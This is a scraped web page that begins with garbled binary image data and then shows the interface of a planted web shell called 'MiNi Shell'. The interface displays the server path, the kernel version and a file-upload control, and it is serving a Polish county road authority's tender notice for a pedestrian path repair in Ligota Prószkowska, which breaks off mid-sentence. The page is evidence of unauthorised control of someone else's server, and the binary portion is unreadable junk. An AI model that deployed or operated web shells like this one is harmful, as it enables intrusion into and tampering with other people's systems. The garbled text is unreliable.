JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230816/0035441301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi dla pieszych w ciągu drogi powiatowej Nr 1718 O w miejscowości Ligota Prószkowska </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Opolski -Zarząd Dróg Powiatowych w Opolu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531421584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Książąt Opolskich 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zdp.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp.opole.pl/291/strona-glowna.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi dla pieszych w ciągu drogi powiatowej Nr 1718 O w miejscowości Ligota Prószkowska </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e62fc7f-3c15-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00354413</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00054614/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont drogi dla pieszych w ciągu drogi powiatowej Nr 1718 O w miejscowości Ligota Prószkowska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7e62fc7f-3c15-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@zdp.opole.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zostały opisane w pkt. 12 SWZ - Tom I Instrukcja Dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest ZDP w Opolu przy ul. Ks. Opolskich 27, 45–005 Opole, tel. 0774414069, zwany dalej Administratorem, email: sekretariat@zdp.opole.pl. IODO: iod@zdp.opole.pl;<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym; 3. Odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.<br/>18 oraz art. 74 ustawy Pzp;<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia;<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7. Posiada Pan/Pani:<br/>−na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych na podstawie art. 18 RODO z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a tak że nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia. Nie przysługuje Pani/Panu:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−prawo do przenoszenia danych osobowych,<br/>o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZ.261.1.18.2023.EW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest remont drogi dla pieszych w ciągu drogi powiatowej<br/>Nr 1718 O w m. Ligota Prószkowska. Zakres zadania obejmuje odcinek o długości 388 mb., który rozpoczyna się od<br/>istniejącego chodnika w ciągu drogi powiatowej Nr 1718 O.<br/>Zamówienie należy wykonać w całości.<br/>Zadanie swoim zakresem obejmuje m.in.:<br/>- opracowanie i zatwierdzenie projektu tymczasowej organizacji ruchu,<br/>- dostarczenie, montaż, utrzymanie i demontaż tymczasowego oznakowania;<br/>- wytyczenie obiektu, roboty pomiarowe, pomiary,<br/>- roboty przygotowawcze, roboty rozbiórkowe,<br/>- wykonanie remontu chodnika zgodnie z przedmiarem robót,<br/>- pozostałe roboty niezbędne do wykonania zgodnie z projektem i SST.<br/>Wszelkie materiały użyteczne pochodzące z rozbiórki (z wyjątkiem frezowiny) stanowią własność Wykonawcy. Zamawiający<br/>dopuszcza możliwość wykorzystania materiałów<br/>z rozbiórki, w tym frezowiny, do wbudowania pod warunkiem spełnienia wymogów normatywnych i specyfikacji. Wartość<br/>oferty powinna uwzględniać zastosowanie powyższych materiałów. W przypadku nie wykorzystania frezowiny do<br/>wbudowania należy ją przekazać na Obwód Drogowy w Dąbrowie.<br/>2. Zamawiający wymaga aby oferta obejmowała całość przedmiotu zamówienia.<br/>Zamawiający nie podzielił przedmiotowego zamówienia na części, ponieważ nie jest to uzasadnione ze względu na<br/>specyfikę i technologię realizacji robót. Ewentualny podział zamówienia na części spowodowałby nadmierne trudności<br/>techniczne oraz ryzyko nienależytego wykonania przedmiotowego zamówienia wskutek konieczności wykonania<br/>dodatkowego świadczenia polegającego na koordynacji działań różnych wykonawców realizujących poszczególne części<br/>zamówienia.<br/>3. W ramach realizacji przedmiotu zamówienia Wykonawca będzie zobowiązany do:<br/>- dostarczenia w ciągu 7 dni od daty podpisania umowy Kosztorysu Szczegółowego oraz harmonogramu rzeczowofinansowego<br/>robót. Przekazanie powyższych warunkuje przekazanie placu budowy Wykonawcy,<br/>- opracowania planu bezpieczeństwa i ochrony zdrowia,<br/>- opracowania projektu tymczasowej organizacji ruchu (wraz z jego zatwierdzeniem),<br/>- zapewnienia obsługi geodezyjnej niezbędnej do realizacji zadania,<br/>- wykonania i utrzymania oznakowania w trakcie prowadzenia robót oraz jego rozbiórki po ukończeniu robót,<br/>- ewentualnego: odwodnienia wykopów, pompowania wody, wymianę gruntu;<br/>- zorganizowanie, utrzymanie i likwidację zaplecza i placu budowy;<br/>- zapewnienia bezpiecznej przeprawy pieszych przez teren robót,<br/>- innych prac wynikających z uzgodnień branżowych i warunków realizacji kontraktu oraz ze specyfikacji technicznych i<br/>projektu;<br/>- ewentualnego: wykonania prac w uzgodnieniu lub pod nadzorem gestorów sieci,<br/>- sporządzania dokumentacji fotograficznej z przebiegu robót ( 1 egz. płyt CD, przekazane wraz z dokumentacją<br/>powykonawczą),<br/>Koszt powyższych prac obciąży Wykonawcę robót.<br/>4. Podstawą obliczenia ceny oferty jest Dokumentacja projektowa zamieszczona w Tomie III niniejszej SWZ.<br/>Uwaga!!! Przedmiar robót stanowi dokument wyłącznie pomocniczy.<br/>5. Na wykonane roboty Wykonawca udzieli gwarancji na okres min. 48 miesięcy.<br/>Deklarowany okres gwarancji stanowi jedno z kryteriów oceny ofert:<br/>- minimalny deklarowany okres gwarancji - 48 miesięcy<br/>- maksymalny deklarowany okres gwarancji - 60 miesięcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny ofert:<br/>a) kryterium: cena oferty (C) – waga kryterium - 60%<br/>b) kryterium: okres gwarancji jakości (G ) – waga kryterium - 40%<br/>1.1. Kryterium „Cena” (C) - waga 60 %:<br/>Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę<br/>w Formularzu ofertowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>C = ( C min / C o ) x 100 pkt, gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>C min – cena brutto oferty najtańszej,<br/>C o – cena brutto oferty ocenianej.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>1.2. Kryterium „ Okres gwarancji” (G) – waga 40 %<br/>Ocena dokonana zostanie na podstawie okresu gwarancji podanego w miesiącach – zadeklarowanego przez Wykonawcę w pkt. VIII<br/>Formularza ofertowego.<br/>Najkrótszy możliwy okres gwarancji dopuszczony przez Zamawiającego: G min =48 miesięcy od dnia kolejnego po dacie odbioru<br/>robót.<br/>Najdłuższy możliwy okres gwarancji przyjęty do oceny oferty przez Zamawiającego:<br/>G max = 60 miesięcy od dnia kolejnego po dacie odbioru robót.<br/>Wykonawca może zaproponować okres gwarancji jakości w miesiącach tj. 48 lub 54 lub 60 miesięcy.<br/>Jeżeli Wykonawca zaproponuje okres gwarancji dłuższy niż 60 miesięcy to do oceny takiej oferty zostanie przyjęty okres 60<br/>miesięcy i taki okres zostanie przyjęty w Umowie z Wykonawcą.<br/>Oferty, w których nie zostanie zaoferowany okres gwarancji (nie zostanie podany okres w pkt. VIII Formularza ofertowego) lub<br/>będzie on krótszy niż 48 miesięcy zostaną odrzucone na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Ilość punktów w tym kryterium zostanie naliczona zgodnie z poniżej podaną informacją:<br/>- okres gwarancji 48 miesięcy - 0 punktów,<br/>- okres gwarancji 54 miesięcy - 50 punktów,<br/>- okres gwarancji 60 miesięcy - 100 punktów.<br/>2. Zamawiający uzna za najkorzystniejszą ofertę Wykonawcy, który spełni warunki udziału w postępowaniu, a jego oferta nie będzie<br/>podlegać odrzuceniu oraz otrzyma największą liczbę punków wyliczoną zgodnie ze wzorem:<br/>Σo = Co* 0,60 + Go* 0,40,<br/>gdzie: Σo – łączna ilość punktów dla ocenianej oferty<br/>Co – liczba punktów przyznana ofercie ocenianej w kryterium „Cena oferty”<br/>Go – liczba punktów przyznana ofercie ocenianej w kryterium „Okres gwarancji jakości”<br/>3. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera pośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>4. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>5. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt. 4 powyżej zamawiający wzywa wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>6. Jeżeli w przypadku o którym mowa w pkt. 19.5 powyżej zostały złożone oferty dodatkowe o takiej samej cenie zamawiający<br/>unieważnia postępowanie zgodnie z art. 255 pkt 4 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez<br/>zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają nw. warunki udziału dotyczące:<br/>1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa żadnych warunków w tym zakresie.<br/>2) sytuacji ekonomicznej i finansowej:<br/>a) Wykonawca musi posiadać średni roczny przychód w obszarze objętym zamówieniem tj. w zakresie robót budowlanych,<br/>za ostatnie 3 lata obrotowe,<br/>a jeżeli okres prowadzenia działalności jest krótszy – za ten okres w wysokości co najmniej 300 000,00 zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - warunek określony powyżej musi spełniać<br/>jeden z Wykonawców.<br/>3) zdolności technicznej lub zawodowej:<br/>Wykonawca musi wskazać osoby, które zostaną skierowane do realizacji zamówienia, legitymujące się kwalifikacjami<br/>zawodowymi, uprawnieniami, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone:<br/>- kierownik budowy i robót drogowych:<br/>- min. 5 lat stażu pracy i min. 3 lata pracy na tym stanowisku od uzyskania uprawnień,<br/>- uprawnienia budowlane bez ograniczeń do kierowania robotami<br/>w branży drogowej.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek określony powyżej Wykonawcy<br/>muszą spełniać.<br/>3. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw do wykluczenia Wykonawcy z udziału<br/>w postępowaniu:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego, o których mowa w art. 109 ust. 1 pkt 6 ustawy Pzp.<br/>1A. Wykonawca, którego oferta zostanie najwyżej oceniona ( jako najkorzystniejsza ) w przypadku, gdy Wykonawca polega na<br/>zdolnościach innych podmiotów na wezwanie Zamawiającego zobowiązany będzie złożyć dokumenty podmiotu, na zdolności lub<br/>sytuację którego Wykonawca powoływał się w celu wykazania spełnienia warunków udziału w postępowaniu, na potwierdzenie<br/>braku podstaw wykluczenia z postępowania tego podmiotu tj:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 